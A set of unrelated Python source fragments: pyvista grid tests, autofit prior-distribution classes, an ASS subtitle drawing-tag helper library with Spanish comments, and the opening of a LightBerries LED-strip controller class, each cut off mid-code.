assert grid.bounds == [-350.0,1350.0, -400.0,1350.0, -850.0,0.0]
assert grid.n_arrays == 1
def test_cast_rectilinear_grid():
grid = pyvista.read(examples.rectfile)
structured = grid.cast_to_structured_grid()
assert isinstance(structured, pyvista.StructuredGrid)
assert structured.n_points == grid.n_points
assert structured.n_cells == grid.n_cells
assert np.allclose(structured.points, grid.points)
for k, v in grid.point_arrays.items():
assert np.allclose(structured.point_arrays[k], v)
for k, v in grid.cell_arrays.items():
assert np.allclose(structured.cell_arrays[k], v)
def test_create_uniform_grid_from_specs():
# create UniformGrid
dims = [10, 10, 10]
grid = pyvista.UniformGrid(dims) # Using default spacing and origin
assert grid.dimensions == [10, 10, 10]
assert grid.extent == [0, 9, 0, 9, 0, 9]
assert grid.origin == [0.0, 0.0, 0.0]
assert grid.spacing == [1.0, 1.0, 1.0]
spacing = [2, 1, 5]
grid = pyvista.UniformGrid(dims, spacing) # Using default origin
assert grid.dimensions == [10, 10, 10]
assert grid.origin == [0.0, 0.0, 0.0]
assert grid.spacing == [2.0, 1.0, 5.0]
origin = [10, 35, 50]
grid = pyvista.UniformGrid(dims, spacing, origin) # Everything is specified
assert grid.dimensions == [10, 10, 10]
assert grid.origin == [10.0, 35.0, 50.0]
assert grid.spacing == [2.0, 1.0, 5.0]
assert grid.dimensions == [10, 10, 10]
def test_uniform_setters():
grid = pyvista.UniformGrid()
grid.dimensions = [10, 10, 10]
assert grid.GetDimensions() == (10, 10, 10)
assert grid.dimensions == [10, 10, 10]
grid.spacing = [5, 2, 1]
assert grid.GetSpacing() == (5, 2, 1)
assert grid.spacing == [5, 2, 1]
grid.origin = [6, 27.7, 19.8]
assert grid.GetOrigin() == (6, 27.7, 19.8)
assert grid.origin == [6, 27.7, 19.8]
def test_create_uniform_grid_from_file():
grid = examples.load_uniform()
assert grid.n_cells == 729
assert grid.n_points == 1000
assert grid.bounds == [0.0,9.0, 0.0,9.0, 0.0,9.0]
assert grid.n_arrays == 2
assert grid.dimensions == [10, 10, 10]
def test_read_uniform_grid_from_file():
grid = pyvista.read(examples.uniformfile)
assert grid.n_cells == 729
assert grid.n_points == 1000
assert grid.bounds == [0.0,9.0, 0.0,9.0, 0.0,9.0]
assert grid.n_arrays == 2
assert grid.dimensions == [10, 10, 10]
def test_cast_uniform_to_structured():
grid = examples.load_uniform()
structured = grid.cast_to_structured_grid()
assert structured.n_points == grid.n_points
assert structured.n_arrays == grid.n_arrays
assert structured.bounds == grid.bounds
def test_cast_uniform_to_rectilinear():
grid = examples.load_uniform()
rectilinear = grid.cast_to_rectilinear_grid()
assert rectilinear.n_points == grid.n_points
assert rectilinear.n_arrays == grid.n_arrays
assert rectilinear.bounds == grid.bounds
@pytest.mark.parametrize('binary', [True, False])
@pytest.mark.parametrize('extension', ['vtr', 'vtk'])
def test_save_rectilinear(extension, binary, tmpdir):
filename = str(tmpdir.mkdir("tmpdir").join('tmp.%s' % extension))
ogrid = examples.load_rectilinear()
ogrid.save(filename, binary)
grid = pyvista.RectilinearGrid(filename)
assert grid.n_cells == ogrid.n_cells
assert np.allclose(grid.x, ogrid.x)
assert np.allclose(grid.y, ogrid.y)
assert np.allclose(grid.z, ogrid.z)
assert grid.dimensions == ogrid.dimensions
grid = pyvista.read(filename)
assert isinstance(grid, pyvista.RectilinearGrid)
assert grid.n_cells == ogrid.n_cells
assert np.allclose(grid.x, ogrid.x)
assert np.allclose(grid.y, ogrid.y)
assert np.allclose(grid.z, ogrid.z)
assert grid.dimensions == ogrid.dimensions
@pytest.mark.parametrize('binary', [True, False])
@pytest.mark.parametrize('extension', ['vti', 'vtk'])
def test_save_uniform(extension, binary, tmpdir):
filename = str(tmpdir.mkdir("tmpdir").join('tmp.%s' % extension))
ogrid = examples.load_uniform()
ogrid.save(filename, binary)
grid = pyvista.UniformGrid(filename)
assert grid.n_cells == ogrid.n_cells
assert grid.origin == ogrid.origin
assert grid.spacing == ogrid.spacing
assert grid.dimensions == ogrid.dimensions
grid = pyvista.read(filename)
assert isinstance(grid, pyvista.UniformGrid)
assert grid.n_cells == ogrid.n_cells
assert grid.origin == ogrid.origin
assert grid.spacing == ogrid.spacing
assert grid.dimensions == ogrid.dimensions
def test_grid_points():
"""Test the points methods on UniformGrid and RectilinearGrid"""
points = np.array([[0, 0, 0],
[1, 0, 0],
[1, 1, 0],
[0, 1, 0],
[0, 0, 1],
[1, 0, 1],
[1, 1, 1],
[0, 1, 1]])
grid = pyvista.UniformGrid()
grid.points = points
assert grid.dimensions == [2, 2, 2]
assert grid.spacing == [1, 1, 1]
assert grid.origin == [0., 0., 0.]
assert np.allclose(np.unique(grid.points, axis=0), np.unique(points, axis=0))
opts = np.c_[grid.x, grid.y, grid.z]
assert np.allclose(np.unique(opts, axis=0), np.unique(points, axis=0))
# Now test rectilinear grid
del grid
grid = pyvista.RectilinearGrid()
grid.points = points
assert grid.dimensions == [2, 2, 2]
assert np.allclose(np.unique(grid.points, axis=0), np.unique(points, axis=0))
def test_grid_extract_selection_points():
grid = | |
<gh_stars>0
import inspect
import math
import sys
from abc import ABC, abstractmethod
from typing import Union, Tuple
import numpy as np
from scipy import stats
from scipy.special import erfcinv
from autoconf import conf
from autofit import exc
from autofit.mapper.model_object import ModelObject
from autofit.mapper.prior.arithmetic import ArithmeticMixin
from autofit.mapper.prior.deferred import DeferredArgument
from autofit.mapper.prior_model.attribute_pair import (
cast_collection,
PriorNameValue,
InstanceNameValue,
)
from autofit.mapper.variable import Variable
class WidthModifier:
def __init__(self, value):
self.value = float(value)
@classmethod
def name_of_class(cls) -> str:
"""
A string name for the class, with the prior suffix removed.
"""
return cls.__name__.replace("WidthModifier", "")
@classmethod
def from_dict(cls, width_modifier_dict):
return width_modifier_type_dict[width_modifier_dict["type"]](
value=width_modifier_dict["value"]
)
@property
def dict(self):
return {"type": self.name_of_class(), "value": self.value}
@staticmethod
def for_class_and_attribute_name(cls, attribute_name):
prior_dict = conf.instance.prior_config.for_class_and_suffix_path(
cls, [attribute_name, "width_modifier"]
)
return WidthModifier.from_dict(prior_dict)
def __eq__(self, other):
return self.__class__ is other.__class__ and self.value == other.value
class Limits:
@staticmethod
def for_class_and_attributes_name(cls, attribute_name):
limit_dict = conf.instance.prior_config.for_class_and_suffix_path(
cls, [attribute_name, "gaussian_limits"]
)
return limit_dict["lower"], limit_dict["upper"]
class RelativeWidthModifier(WidthModifier):
def __call__(self, mean):
return self.value * mean
class AbsoluteWidthModifier(WidthModifier):
def __call__(self, _):
return self.value
class TuplePrior(ModelObject):
"""
A prior comprising one or more priors in a tuple
"""
@property
@cast_collection(PriorNameValue)
def prior_tuples(self):
"""
Returns
-------
priors: [(String, Prior)]
A list of priors contained in this tuple
"""
return list(filter(lambda t: isinstance(t[1], Prior), self.__dict__.items()))
@property
def unique_prior_tuples(self):
return self.prior_tuples
@property
@cast_collection(InstanceNameValue)
def instance_tuples(self):
"""
Returns
-------
instances: [(String, instance)]
A list of instances
"""
return list(
sorted(
filter(lambda t: isinstance(t[1], float), self.__dict__.items()),
key=lambda tup: tup[0],
)
)
def value_for_arguments(self, arguments):
"""
Parameters
----------
arguments: {Prior: float}
A dictionary of arguments
Returns
-------
tuple: (float,...)
A tuple of float values
"""
def convert(tup):
if hasattr(tup, "prior"):
return arguments[tup.prior]
return tup.instance
return tuple(
map(
convert,
sorted(
self.prior_tuples + self.instance_tuples, key=lambda tup: tup.name
),
)
)
def gaussian_tuple_prior_for_arguments(self, arguments):
"""
Parameters
----------
arguments: {Prior: float}
A dictionary of arguments
Returns
-------
tuple_prior: TuplePrior
A new tuple prior with gaussian priors
"""
tuple_prior = TuplePrior()
for prior_tuple in self.prior_tuples:
setattr(tuple_prior, prior_tuple.name, arguments[prior_tuple.prior])
return tuple_prior
def __getitem__(self, item):
return self.prior_tuples[item][1]
class Prior(Variable, ABC, ArithmeticMixin):
def __init__(self, lower_limit=0.0, upper_limit=1.0):
"""
An object used to mappers a unit value to an attribute value for a specific
class attribute.
Parameters
----------
lower_limit: Float
The lowest value this prior can return
upper_limit: Float
The highest value this prior can return
"""
super().__init__()
self.lower_limit = float(lower_limit)
self.upper_limit = float(upper_limit)
if self.lower_limit >= self.upper_limit:
raise exc.PriorException(
"The upper limit of a prior must be greater than its lower limit"
)
def assert_within_limits(self, value):
if not (self.lower_limit <= value <= self.upper_limit):
raise exc.PriorLimitException(
"The physical value {} for a prior "
"was not within its limits {}, {}".format(
value, self.lower_limit, self.upper_limit
)
)
@staticmethod
def for_class_and_attribute_name(cls, attribute_name):
prior_dict = conf.instance.prior_config.for_class_and_suffix_path(
cls, [attribute_name]
)
return Prior.from_dict(prior_dict)
@property
def width(self):
return self.upper_limit - self.lower_limit
@abstractmethod
def value_for(self, unit: float) -> float:
"""
Return a physical value for a value between 0 and 1 with the transformation
described by this prior.
Parameters
----------
unit
A hypercube value between 0 and 1.
Returns
-------
A physical value.
"""
def instance_for_arguments(self, arguments):
return arguments[self]
def __eq__(self, other):
try:
return self.id == other.id
except AttributeError:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(self.id)
def __repr__(self):
return "<{} id={} lower_limit={} upper_limit={}>".format(
self.__class__.__name__, self.id, self.lower_limit, self.upper_limit
)
@classmethod
def from_dict(cls, prior_dict: dict) -> Union["Prior", DeferredArgument]:
"""
Returns a prior from a JSON representation.
Parameters
----------
prior_dict : dict
A dictionary representation of a prior including a type (e.g. Uniform) and all constructor arguments.
Returns
-------
An instance of a child of this class.
"""
if prior_dict["type"] == "Constant":
return prior_dict["value"]
if prior_dict["type"] == "Deferred":
return DeferredArgument()
# noinspection PyProtectedMember
return prior_type_dict[prior_dict["type"]](
**{
key: value
for key, value in prior_dict.items()
if key not in ("type", "width_modifier", "gaussian_limits")
}
)
@property
def dict(self) -> dict:
"""
A dictionary representation of this prior
"""
prior_dict = {
"lower_limit": self.lower_limit,
"upper_limit": self.upper_limit,
"type": self.name_of_class(),
}
return prior_dict
@classmethod
def name_of_class(cls) -> str:
"""
A string name for the class, with the prior suffix removed.
"""
return cls.__name__.replace("Prior", "")
@property
def limits(self) -> Tuple[float, float]:
return self.lower_limit, self.upper_limit
class GaussianPrior(Prior):
"""A prior with a gaussian distribution"""
__name__ = "gaussian_prior"
def __init__(self, mean, sigma, lower_limit=-math.inf, upper_limit=math.inf):
super().__init__(lower_limit, upper_limit)
self.mean = float(mean)
self.sigma = float(sigma)
self._log_pdf = None
@property
def logpdf(self):
if self._log_pdf is None:
norm = stats.norm(
loc=self.mean,
scale=self.sigma
)
self._log_pdf = norm.logpdf
return self._log_pdf
def __call__(self, x):
return self.logpdf(x)
def value_for(self, unit):
"""
Parameters
----------
unit: Float
A unit hypercube value between 0 and 1
Returns
-------
value: Float
A value for the attribute biased to the gaussian distribution
"""
return self.mean + (self.sigma * math.sqrt(2) * erfcinv(2.0 * (1.0 - unit)))
def log_prior_from_value(self, value):
"""
Returns the log prior of a physical value, so the log likelihood of a model evaluation can be converted to a
posterior as log_prior + log_likelihood.
This is used by Emcee in the log likelihood function evaluation.
Parameters
----------
value : float
The physical value of this prior's corresponding parameter in a `NonLinearSearch` sample."""
return (value - self.mean) ** 2.0 / (2 * self.sigma ** 2.0)
def __str__(self):
"""The line of text describing this prior for the model_mapper.info file"""
return (
"GaussianPrior, mean = " + str(self.mean) + ", sigma = " + str(self.sigma)
)
def __repr__(self):
return (
"<GaussianPrior id={} mean={} sigma={} "
"lower_limit={} upper_limit={}>".format(
self.id, self.mean, self.sigma, self.lower_limit, self.upper_limit
)
)
@property
def dict(self) -> dict:
"""
A dictionary representation of this prior
"""
prior_dict = super().dict
return {**prior_dict, "mean": self.mean, "sigma": self.sigma}
class UniformPrior(Prior):
"""A prior with a uniform distribution between a lower and upper limit"""
def value_for(self, unit):
"""
Parameters
----------
unit: Float
A unit hypercube value between 0 and 1
Returns
-------
value: Float
A value for the attribute between the upper and lower limits
"""
return self.lower_limit + unit * (self.upper_limit - self.lower_limit)
def log_prior_from_value(self, value):
"""
Returns the log prior of a physical value, so the log likelihood of a model evaluation can be converted to a
posterior as log_prior + log_likelihood.
This is used by Emcee in the log likelihood function evaluation.
NOTE: For a UniformPrior this is always zero, provided the value is between the lower and upper limit. Given
this is check for when the instance is made (in the *instance_from_vector* function), we thus can simply return
zero in this function.
Parameters
----------
value : float
The physical value of this prior's corresponding parameter in a `NonLinearSearch` sample."""
return 0.0
@property
def mean(self):
return self.lower_limit + (self.upper_limit - self.lower_limit) / 2
@mean.setter
def mean(self, new_value):
difference = new_value - self.mean
self.lower_limit += difference
self.upper_limit += difference
def __str__(self):
"""The line of text describing this prior for the model_mapper.info file"""
return (
"UniformPrior, lower_limit = "
+ str(self.lower_limit)
+ ", upper_limit = "
+ str(self.upper_limit)
)
class LogUniformPrior(UniformPrior):
"""A prior with a uniform distribution between a lower and upper limit"""
def __init__(self, lower_limit=1e-6, upper_limit=1.0):
"""
An object used to mappers a unit value to an attribute value for a specific
class attribute.
Parameters
----------
lower_limit: Float
The lowest value this prior can return
upper_limit: Float
The highest value this prior can return
"""
super().__init__(lower_limit=lower_limit, upper_limit=upper_limit)
if (self.lower_limit <= 0.0):
raise exc.PriorException(
"The lower limit of a LogUniformPrior cannot be zero or negative."
)
def value_for(self, unit):
"""
Parameters
----------
unit: Float
A unit hypercube value between 0 and 1
Returns
-------
value: Float
A value for the attribute between the upper and lower limits
"""
return 10.0 ** (
np.log10(self.lower_limit)
+ unit * (np.log10(self.upper_limit) - np.log10(self.lower_limit))
)
def log_prior_from_value(self, value):
"""
Returns the log prior of a physical value, so the log likelihood of a model evaluation can be converted to a
posterior as log_prior + log_likelihood.
This is used by Emcee in the log likelihood function evaluation.
Parameters
----------
value : float
The physical value of this prior's corresponding parameter in a `NonLinearSearch` sample."""
return 1.0 / value
def __str__(self):
"""The line of text describing this prior for the model_mapper.info file"""
return (
| |
"""
Clip del texto, la parte encerrada en el texto es visible.
clip(x1, x2, x3, x4)
clip(vector)
"""
tipo = ""
if reverse:
tipo = "i"
if y1 == None and x2 == None and y2 == None:
vector = x1 # clip vectorial
return '\\{:s}clip({:s})'.format(tipo, vector)
elif x2 == None and y2 == None:
scale, vector = x1, y1 # clip vectorial
return '\\{:s}clip({:d},{:s})'.format(tipo, scale, vector)
else:
x1, y1 = int(math.ceil(x1)), int(math.ceil(y1))
x2, y2 = int(math.ceil(x2)), int(math.ceil(y2))
return '\\{:s}clip({:d},{:d},{:d},{:d})'.format(tipo, x1, y1, x2, y2)
def p(mode, code=None):
"""Dibuja la figura especificada."""
if not code:
code, mode = mode, 1
return '{\\p%d}%s{\\p0}' % (mode, code)
def blur(strength=1, dx=None, dy=None):
"""
Crea un difuminado gaussiano al texto,
especificando valores por separado para x y para y,
si el borde no es cero el difuminado se aplicara al borde.
@blr: intensidad del blur
@dx, @dy: distancia en x, y
"""
return '\\blur' + round_format_str(strength, 2)
def fax(factor):
"""Distorsión de perspectiva del texto en "x"."""
# Usually factor will be a small number,
# not larger than 2 as that creates a very strong distortion.
if factor > 2:
return '\\fax2'
else:
return '\\fax' + round_format_str(factor)
def fay(factor):
"""Distorsión de perspectiva del texto en "y"."""
if factor > 2:
return '\\fay2'
else:
return '\\fay' + round_format_str(factor)
def xbord(valor=1):
"""Tamaño del Borde en "x"."""
return '\\xbord' + round_format_str(valor, 2)
def ybord(valor=1):
"""Tamaño del Borde en "y"."""
return '\\ybord' + round_format_str(valor, 2)
def xshad(depth=1):
"""Que tan alejada esta la sombra del texto en el eje de las "x"."""
return '\\xshad' + round_format_str(depth, 2)
def yshad(depth=1):
"""Que tan alejada esta la sombra del texto en el eje de las "y"."""
return '\\yshad' + round_format_str(depth, 2)
def cycletags(inicio, duracion, intervalo, *tags):
"""
Crea un intervalo de tags, que se iran rotando,
segun el intervalo de tiempo, y la duracion especificada
@inicio: tiempo de inicio
@duracion: duracion del efecto
@intervalo: intervalo de tiempo que durara cada grupo de tags
@tags: grupos de tags separadas por una coma (pueden ser mas de 2)
Ejemplo:
cycletags(200, 1000, 100, be(1), be(2))
>>> '\\t(200,300,\\be1)\t(300,400,\\be2)..\\t(900,1000,\\be2)'
"""
i = 0
n = len(tags)
ttags = ''
start_time = inicio
end_time = start_time + intervalo
while end_time < duracion:
ttags += t(start_time, end_time, tags[i % n])
start_time = end_time
end_time += intervalo
i += 1
else:
ttags += t(start_time, duracion, tags[i % n])
return ttags
# Draw commands
def draw(tipo, x, y):
"""
Comando de dibujo
@tipo: tipo de comando de dibujo (m, n, l, p, c)
@x: posición en el eje x
@y: posición en el eje y
Ejemplo:
draw("m", 10, 30)
>>> 'm 10 30 '
"""
return '{:s} {:s} {:s} '.format(
tipo, round_format_str(x, ), round_format_str(y, 2))
def draw_shape(*points):
for i, (x, y) in enumerate(points):
if i == 0:
shape = draw("m", x, y)
else:
shape += draw("l", x, y)
return shape
def draw_bezier(x1, y1, x2, y2, x3, y3):
return 'b %s %s %s %s %s %s ' % (
round_format_str(x1, 2), round_format_str(y1, 2),
round_format_str(x2, 2), round_format_str(y2, 2),
round_format_str(x3, 2), round_format_str(y3, 2))
def draw_spline(*posiciones):
bspline = 's '
for pos in posiciones:
bspline += '%s ' % round_format_str(pos, 2)
return bspline + ' c'
def shape_poligon(radio, lados):
"""
Comando de dibujo (Polígono Regular)
@radio: radio del poligono
@lados: lados del poligonos
Ejemplo:
poligon(15, 5)
>>>
"""
iangle = 360 / lados
# horizontal symmetry position
if lados % 2 != 0:
angle = 90 + (iangle / 2)
else:
angle = 90
pdraw = []
for i in range(lados + 1):
# ass draw commands
if i == 0:
dcommand = "m" # start drawing
else:
dcommand = "l" # join points with lines
# convert polar to rectangular
pdraw.append(draw(dcommand, *polar2rec(radio, angle)))
angle += iangle
return translate_shape("".join(pdraw), radio, radio)
def shape_star(radio1, radio2, spikes):
# the smallest radio is always the inner circle
if radio1 > radio2:
radio1, radio2 = radio2, radio1
iangle = 360 / spikes
# horizontal symmetry position
if spikes % 2 == 0:
angle1 = 90 + (iangle / 2)
else:
angle1 = 90
angle2 = angle1 + (iangle / 2)
pdraw = []
for i in range(spikes + 1):
# ass draw commands
if i == 0:
dcommand = "m" # start drawing
else:
dcommand = "l" # join points with lines
# convert polar to rectangular
pdraw.append(draw(dcommand, *polar2rec(radio1, angle1)))
pdraw.append(draw("l", *polar2rec(radio2, angle2)))
angle1 += iangle
angle2 += iangle
return translate_shape("".join(pdraw), radio2, radio2)
def shape_pentagon(r):
"""Comando de dibujo (Polígono Regular)
@r: radio del poligono
Ejemplo:
pentagon(15)
>>>
"""
return shape_poligon(r, 5)
def shape_circle(radio, substract=False):
def resize(m):
num = (float(m.group(0)) / 100) * radio * 2
return round_format_str(num, 2)
def swap_coords(m):
return m.group(2) + " " + m.group(1)
shape = ("m 50 0 b 22 0 0 22 0 50 b 0 78 22 100 50 100 b "
"78 100 100 78 100 50 b 100 22 78 0 50 0 ")
if substract:
shape = shape_filter(shape, swap_coords)
return re.sub("\d+", resize, shape)
def shape_ellipse(w, h):
def rstr(n):
return round_format_str(n, 2)
w2, h2 = w / 2, h / 2
shape = (
"m %d %s "
"b %d %s %d %d %s %d "
"%s %d %s %d %s %s "
"%s %s %s %s %s %s "
"%s %s %d %s %d %s")
return shape % (
0, rstr(h2), # move
0, rstr(h2), 0, 0, rstr(w2), 0, # curve 1
rstr(w2), 0, rstr(w), 0, rstr(w), rstr(h2), # curve 2
rstr(w), rstr(h2), rstr(w), rstr(h), rstr(w2), rstr(h), # curve 3
rstr(w2), rstr(h), 0, rstr(h), 0, rstr(h2)) # curve 4
def shape_pixel():
return shape_square(1)
def shape_square(width=1, height=None):
if not height:
height = width
pt = draw('m', 0, 0)
pt += draw('l', width, 0)
pt += draw('l', width, height)
pt += draw('l', 0, height)
return pt
def shape_triangle(size):
def rstr(n):
return round_format_str(n, 2)
h = math.sqrt(3) * (size / 2)
base = -h
shape = 'm %s %s l %s %s 0 %s %s %s' % (
rstr(size / 2), rstr(base),
rstr(size), rstr(base + h),
rstr(base + h), rstr(size / 2), rstr(base))
return translate_shape(shape, 0, h)
def shape_ring(radio, outline_width):
radio2 = radio - outline_width
circle2 = shape_circle(radio2, substract=True)
circle2 = translate_shape(circle2, -radio2, -radio2)
circle2 = translate_shape(circle2, radio, radio)
return shape_circle(radio) + circle2
def shape_heart(size=30):
def resize(m):
num = (float(m.group(0)) / 30) * size
return round_format_str(num, 2)
path = ("m 15 30 b 27 22 30 18 30 14 30 8 22 "
"0 15 10 8 0 0 8 0 14 0 18 3 22 15 30")
return re.sub("\d+", resize, path)
def shape_filter(shape, function):
return re.sub("(-?\d+.d+|-?\d+)\s(-?\d+.d+|-?\d+)", function, shape)
def shape_max(shape):
def abs_float(n):
return abs(float(n))
pattern = "(-?\d+.d+|-?\d+)\s(-?\d+.d+|-?\d+)"
coords = [list(map(abs_float, n)) for n in re.findall(pattern, shape)]
maxx = max(coords, key=operator.itemgetter(0))[0]
maxy = max(coords, key=operator.itemgetter(1))[1]
return maxx, maxy
def shape_min(shape):
def abs_float(n):
return abs(float(n))
pattern = "(-?\d+.d+|-?\d+)\s(-?\d+.d+|-?\d+)"
coords = [map(abs_float, n) for n in re.findall(pattern, shape)]
maxx = min(coords, key=operator.itemgetter(0))[0]
maxy = min(coords, key=operator.itemgetter(1))[1]
return maxx, maxy
def rotate_shape(shape, angle):
theta = math.radians(angle)
# translate to origin
# rotate
# translate original position
def rotate(m):
x, y = float(m.group(1)), float(m.group(2))
x1 = x * math.cos(theta) - y * math.sin(theta)
y1 = x * math.sin(theta) + y * math.cos(theta)
return round_format_str(x1, 2) + " " + round_format_str(y1, 2)
maxx, maxy = shape_max(shape)
shape_origin = translate_shape(shape, -maxx / 2, -maxy / 2)
shape_rotated = shape_filter(shape_origin, rotate)
maxx, maxy = shape_max(shape_rotated)
shape_opos = translate_shape(shape_rotated, maxx, maxy)
return shape_opos
def translate_shape(shape, x, y):
def move(m):
px, py = float(m.group(1)) + x, float(m.group(2)) + y
return round_format_str(px, 2) + " " + round_format_str(py, 2)
return shape_filter(shape, move)
# def center_shape(shape):
# maxx, maxy = shape_max(shape)
# return translate_shape(shape, -maxx / 2, -maxy / 2)
def scale_shape(shape, x, y=None):
if not y:
y = x
def scale(m):
px, py = float(m.group(1)) * x, float(m.group(2)) * y
return round_format_str(px, 2) + " " + round_format_str(py, 2)
return shape_filter(shape, scale)
def flip_shape(shape):
def flip(m):
return str(0 - int(m.group(1))) + " " + m.group(2)
return shape_filter(shape, flip)
def shape_to_bezier(steps, shape):
pattern = "(-?\d+.d+|-?\d+)\s(-?\d+.d+|-?\d+)"
mx, my = map(float, re.search("m\s" | |
<reponame>joeferg425/ws281x_lightberries
"""Class defines methods for interacting with Light Strings, Patterns, and Functions."""
import time
import random
import logging
from typing import (
Callable,
Dict,
List,
Optional,
Union,
Any,
)
from nptyping import NDArray
import numpy as np
from LightBerries import LightPatterns
from LightBerries.RpiWS281xPatch import rpi_ws281x
from LightBerries.LightBerryExceptions import LightControlException
from LightBerries.LightPixels import Pixel, PixelColors
from LightBerries.LightStrings import LightString
from LightBerries.LightFunctions import LightFunction, LEDFadeType, RaindropStates, SpriteState, ThingMoves
from LightBerries.LightPatterns import (
SolidColorArray,
ConvertPixelArrayToNumpyArray,
RepeatingColorSequenceArray,
ColorTransitionArray,
RainbowArray,
RepeatingRainbowArray,
ReflectArray,
DefaultColorSequence,
DEFAULT_BACKGROUND_COLOR,
)
LOGGER = logging.getLogger("LightBerries")
DEFAULT_REFRESH_DELAY = 50
class LightController:
"""This library wraps the rpi_ws281x library and provides some lighting functions.
See https://github.com/rpi-ws281x/rpi-ws281x-python for questions about rpi_ws281x library.
Quick Start:
1: Create a LightController object specifying ledCount:int, pwmGPIOpin:int,
channelDMA:int, frequencyPWM:int
lights = LightController(10, 18, 10, 800000)
2: Choose a color pattern
lights.useColorRainbow()
3: Choose a function
lights.useFunctionCylon()
4: Choose a duration to run
lights.secondsPerMode = 60
5: Run
lights.run()
"""
def __init__(
self,
ledCount: int = 100,
pwmGPIOpin: int = 18,
channelDMA: int = 10,
frequencyPWM: int = 800000,
invertSignalPWM: bool = False,
ledBrightnessFloat: float = 0.75,
channelPWM: int = 0,
stripTypeLED: Any = None,
gamma: Any = None,
debug: bool = False,
verbose: bool = False,
refreshCallback: Callable = None,
simulate: bool = False,
) -> None:
"""Create a LightController object for running patterns across a rpi_ws281x LED string.
Args:
ledCount: the number of Pixels in your string of LEDs
pwmGPIOpin: the GPIO pin number your lights are hooked up to
(18 is a good choice since it does PWM)
channelDMA: the DMA channel to use (5 is a good option)
frequencyPWM: try 800,000
invertSignalPWM: set true to invert the PWM signal
ledBrightnessFloat: set to a value between 0.0 (OFF), and 1.0 (ON).
This setting tends to introduce flicker the lower it is
channelPWM: defaults to 0, see https://github.com/rpi-ws281x/rpi-ws281x-python
stripTypeLED: see https://github.com/rpi-ws281x/rpi-ws281x-python
gamma: see https://github.com/rpi-ws281x/rpi-ws281x-python
debug: set true for some debugging messages
verbose: set true for even more information
refreshCallback: callback method is called whenever new LED values are sent to LED string
simulate: only call refreshCallback, dont use GPIO
Raises:
SystemExit: if exiting
KeyboardInterrupt: if user quits
LightControlException: if something bad happens
"""
try:
# configure logging
if debug is True or verbose is True:
LOGGER.setLevel(logging.DEBUG)
if verbose is True:
LOGGER.setLevel(5)
self.simulate = simulate
# create ws281x pixel strip
pixelStrip = None
if self.simulate is False:
pixelStrip = rpi_ws281x.PixelStrip(
pin=pwmGPIOpin,
dma=channelDMA,
num=ledCount,
freq_hz=frequencyPWM,
channel=channelPWM,
invert=invertSignalPWM,
gamma=gamma,
strip_type=stripTypeLED,
brightness=int(255 * ledBrightnessFloat),
)
# wrap pixel strip in my own interface object
self.ws28xxLightString: Optional[LightString] = LightString(
pixelStrip=pixelStrip, ledCount=ledCount, simulate=self.simulate
)
# initialize instance variables
self.privateLEDCount: int = len(self.ws28xxLightString)
self.virtualLEDArray: NDArray[(3, Any), np.int32] = SolidColorArray(
arrayLength=self.privateLEDCount,
color=PixelColors.OFF,
)
self.virtualLEDIndexArray: NDArray[(Any,), np.int32] = np.array(
range(len(self.ws28xxLightString))
)
self.privateOverlayDict: Dict[int, NDArray[(3,), np.int32]] = {}
self.privateVirtualLEDCount: int = len(self.virtualLEDArray)
self.privateVirtualLEDIndexCount: int = len(self.virtualLEDIndexArray)
self.privateLastModeChange: float = time.time() - 1000
self.privateNextModeChange: float = time.time()
self.privateRefreshDelay: float = 0.001
self.privateSecondsPerMode: float = 120.0
self.privateBackgroundColor: NDArray[(3,), np.int32] = PixelColors.OFF.array
self.privateColorSequence: NDArray[(3, Any), np.int32] = ConvertPixelArrayToNumpyArray([])
self.privateColorSequenceCount: int = 0
self.privateColorSequenceIndex: int = 0
self.privateLoopForever: bool = False
self.privateLightFunctions: List[LightFunction] = []
# give LightFunction class a pointer to this class
LightFunction.Controller = self
self.refreshCallback: Callable = refreshCallback
# initialize stuff
self.reset()
except SystemExit:
raise
except KeyboardInterrupt:
raise
except Exception as ex:
LOGGER.exception(
"%s.%s Exception: %s",
self.__class__.__name__,
"__init__",
ex,
)
raise LightControlException(str(ex)).with_traceback(ex.__traceback__)
def __del__(
self,
) -> None:
"""Disposes of the rpi_ws281x object (if it exists) to prevent memory leaks.
Raises:
SystemExit: if exiting
KeyboardInterrupt: if user quits
LightControlException: if something bad happens
"""
try:
if hasattr(self, "_LEDArray") and self.ws28xxLightString is not None:
self.off()
self.copyVirtualLedsToWS281X()
self.refreshLEDs()
self.ws28xxLightString.__del__()
self.ws28xxLightString = None
except SystemExit:
raise
except KeyboardInterrupt:
raise
except Exception as ex:
LOGGER.exception(
"%s.%s Exception: %s",
self.__class__.__name__,
self.__del__.__name__,
ex,
)
raise LightControlException(str(ex)).with_traceback(ex.__traceback__)
@property
def virtualLEDCount(self) -> int:
"""The number of virtual LEDs. These include ones that won't display.
Returns:
the number of virtual LEDs
"""
return self.privateVirtualLEDCount
@property
def realLEDCount(self) -> int:
"""The number of LEDs in the LED string.
Returns:
the number of actual LEDs in the string (as configured)
"""
return self.privateLEDCount
@property
def refreshDelay(
self,
) -> float:
"""The delay between starting LED refreshes.
Returns:
the delay between refreshes
"""
return self.privateRefreshDelay
@refreshDelay.setter
def refreshDelay(
self,
delay: float,
) -> None:
"""Set the refresh delay.
Args:
delay: the delay in seconds
"""
self.privateRefreshDelay = float(delay)
@property
def backgroundColor(
self,
) -> NDArray[(3,), np.int32]:
"""The defined background, or "Off" color for the LED string.
Returns:
the rgb value
"""
return self.privateBackgroundColor
@backgroundColor.setter
def backgroundColor(
self,
color: NDArray[(3,), np.int32],
) -> None:
"""Set the background color.
Args:
color: an RGB value
"""
self.privateBackgroundColor = Pixel(color).array
@property
def secondsPerMode(
self,
) -> float:
"""The number of seconds to run the configuration.
Returns:
the seconds to run the current configuration
"""
return self.privateSecondsPerMode
@secondsPerMode.setter
def secondsPerMode(
self,
seconds: float,
) -> None:
"""Set the seconds per mode.
Args:
seconds: the number of seconds
"""
self.privateSecondsPerMode = float(seconds)
@property
def colorSequence(
self,
) -> NDArray[(3, Any), np.int32]:
"""The sequence of RGB values to use for generating patterns when using the functions.
Returns:
the sequence of RGB values
"""
return self.privateColorSequence
@colorSequence.setter
def colorSequence(
self,
colorSequence: NDArray[(3, Any), np.int32],
) -> None:
"""Set the color sequence.
Args:
colorSequence: the sequence of RGB values
"""
self.privateColorSequence = np.copy(ConvertPixelArrayToNumpyArray(colorSequence))
self.colorSequenceCount = len(self.privateColorSequence)
self.colorSequenceIndex = 0
@property
def colorSequenceCount(
self,
) -> int:
"""The number of colors in the defined sequence.
Returns:
the number of LEDs in the sequence
"""
return self.privateColorSequenceCount
